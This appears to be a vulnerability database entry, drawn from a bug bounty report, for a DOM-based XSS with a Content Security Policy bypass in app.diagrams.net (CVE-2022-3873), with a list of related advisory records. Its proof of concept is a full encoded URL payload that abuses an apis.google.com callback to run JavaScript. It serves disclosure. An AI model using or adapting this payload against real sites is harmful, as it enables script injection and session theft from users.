Lucene search
Joaovitormaia52A4085E-B687-489B-9ED6-F0987583ED77HistoryNov 04, 2022 - 12:45 a.m.
XSS and CSP bypass in app.diagrams.net
2022-11-0400:45:00
joaovitormaia
www.huntr.dev
16
input reflection
url sanitization
csp bypass
javascript execution
bug bounty
EPSS
0.001
Percentile
30.0%
Description
The application reflects an input from the url without sanitizing it. With a csp bypass from apis.google.com its possible to execute javascript code.
Proof of Concept
https://app.diagrams.net/?ui=min&p=tickets#_TICKETS%7B%22ticketsConfig%22%3A%7B%22deskApiKey%22%3A%22teste%22%2C%22deskDomain%22%3A%22teste\%22%3E%3Ciframe%20srcdoc=%27%3Cscript%20src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz%26%23x22;-alert(document.domain)-%26%23x22;%3E%3C/script%3E%27%3Easdfasdf%22%7D%7D
Related
cvelist
cvelist
CVE-2022-3873 Cross-site Scripting (XSS) - DOM in jgraph/drawio
2022-11-07 00:00:00
nvd
nvd
CVE-2022-3873
2022-11-07 11:15:10
prion
prion
Cross site scripting
2022-11-07 11:15:00
cve
cve
CVE-2022-3873
2022-11-07 11:15:10
osv
osv
CVE-2022-3873
2022-11-07 11:15:10
ubuntucve
ubuntucve
CVE-2022-3873
2022-11-07 00:00:00